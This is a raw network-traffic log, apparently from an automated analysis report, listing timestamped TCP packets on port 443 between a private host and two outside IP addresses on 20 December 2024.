                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.002883911 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.010453939 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.010545015 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.010560036 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.018261909 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.018337011 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.018353939 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.026295900 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.026391983 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.026417017 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.028902054 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.041244984 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.041337013 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.041352034 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.041382074 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.041443110 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.048191071 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.049290895 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.055133104 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.055191040 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.055210114 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.062294960 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.062422037 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.062489986 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.062506914 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.062800884 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.069412947 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.091429949 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.121560097 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.123989105 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.125206947 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.125303984 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.125320911 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.133024931 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.133086920 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.133093119 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.140820980 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.140887976 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.140893936 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.156301975 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.156352043 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.156409025 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.156430960 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.156672955 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.168598890 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.172642946 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.172693014 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.172715902 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.172724009 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.172765970 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.179177999 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.180656910 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.181207895 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.181298018 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.181339979 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.185666084 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.185789108 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.185807943 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.187738895 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.187794924 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.187803984 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.194762945 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.194854975 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.194875956 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.195033073 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.197844982 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.197918892 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.197930098 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.203140020 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.203167915 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.203210115 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.211236000 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.211261034 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.211349964 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.211383104 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.211411953 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.219799995 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.219909906 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.219927073 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.220222950 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.224354982 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.224376917 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.224426985 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.232745886 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.232825041 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.232844114 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.232891083 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.241091013 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.241162062 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.246943951 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.247006893 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.249036074 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.249046087 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.296113014 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.313540936 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.317025900 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.317079067 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.317089081 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.324219942 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.324280024 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.324286938 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.329863071 CET4434990035.190.80.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.330112934 CET49900443192.168.2.1135.190.80.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.330137014 CET4434990035.190.80.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.331240892 CET4434990035.190.80.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.331304073 CET49900443192.168.2.1135.190.80.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.331569910 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.331634998 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.331640959 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.332731962 CET49900443192.168.2.1135.190.80.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.332812071 CET4434990035.190.80.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.332925081 CET49900443192.168.2.1135.190.80.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.332936049 CET4434990035.190.80.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.343323946 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.343379974 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.343386889 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.348036051 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.348104000 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.348115921 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.348185062 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.357350111 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.357363939 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.357409000 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.357417107 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.357456923 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.366751909 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.366765976 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.366816044 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.370129108 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.370203972 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.371937990 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.372009039 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.373379946 CET49900443192.168.2.1135.190.80.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.375852108 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.375860929 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.375910044 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.376696110 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.376770020 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.383843899 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.383914948 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.385143042 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.385150909 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.385195971 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.389982939 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.390052080 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.390063047 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.390109062 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.390721083 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.390791893 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.397711039 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.397808075 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.399194956 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.399256945 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.401367903 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.401442051 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.404753923 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.404828072 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.404844999 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.404894114 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.404915094 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.404938936 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.404947042 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.404959917 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.405003071 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.408409119 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.408489943 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.505443096 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.505603075 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.507826090 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.507910967 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.517133951 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.517222881 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.525619984 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.525698900 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.529725075 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.529808044 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.537133932 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.537225962 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.544348955 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.544449091 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.547914982 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.547991037 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.555444002 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.555546999 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.561933041 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.562060118 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.566252947 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.566363096 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.572410107 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.572491884 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.579492092 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.579691887 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.583256960 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.583353996 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.587030888 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.587116957 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.587131977 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.587204933 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.587388039 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.587407112 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.594737053 CET49906443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.594764948 CET44349906104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.594854116 CET49906443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.595083952 CET49906443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.595098972 CET44349906104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.793117046 CET4434990035.190.80.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.793396950 CET4434990035.190.80.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.793478012 CET49900443192.168.2.1135.190.80.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.794032097 CET49900443192.168.2.1135.190.80.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.794051886 CET4434990035.190.80.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.794739962 CET49907443192.168.2.1135.190.80.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.794797897 CET4434990735.190.80.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.794869900 CET49907443192.168.2.1135.190.80.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.795142889 CET49907443192.168.2.1135.190.80.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.795152903 CET4434990735.190.80.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:11.430557966 CET49908443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:11.430598021 CET44349908104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:11.430807114 CET49908443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:11.430943012 CET49908443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:11.430952072 CET44349908104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:11.820322037 CET44349906104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:11.820705891 CET49906443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:11.820724964 CET44349906104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:11.821048021 CET44349906104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:11.821376085 CET49906443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:11.821434975 CET44349906104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:11.821511984 CET49906443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:11.863326073 CET44349906104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.012022972 CET4434990735.190.80.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.012303114 CET49907443192.168.2.1135.190.80.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.012331009 CET4434990735.190.80.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.012684107 CET4434990735.190.80.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.013073921 CET49907443192.168.2.1135.190.80.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.013144016 CET4434990735.190.80.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.013216972 CET49907443192.168.2.1135.190.80.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.059326887 CET4434990735.190.80.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.266534090 CET44349906104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.266613960 CET44349906104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.266726971 CET49906443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.322175026 CET49906443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.322190046 CET44349906104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.475459099 CET4434990735.190.80.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.475933075 CET49907443192.168.2.1135.190.80.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.475980997 CET4434990735.190.80.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.476078987 CET49907443192.168.2.1135.190.80.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.642266989 CET44349908104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.642633915 CET49908443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.642647982 CET44349908104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.642956972 CET44349908104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.643270969 CET49908443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.643326998 CET44349908104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.643415928 CET49908443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:12.687325001 CET44349908104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:13.088685036 CET44349908104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:13.088749886 CET44349908104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:13.088794947 CET49908443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:13.089946985 CET49908443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:13.089962006 CET44349908104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:13.096100092 CET49914443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:13.096134901 CET44349914104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:13.096203089 CET49914443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:13.096865892 CET49914443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:13.096879005 CET44349914104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:13.224131107 CET49915443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:13.224184990 CET44349915104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:13.224235058 CET49915443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:13.224551916 CET49915443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:13.224564075 CET44349915104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:14.318722963 CET44349914104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:14.319094896 CET49914443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:14.319123030 CET44349914104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:14.319597960 CET44349914104.18.94.41192.168.2.11
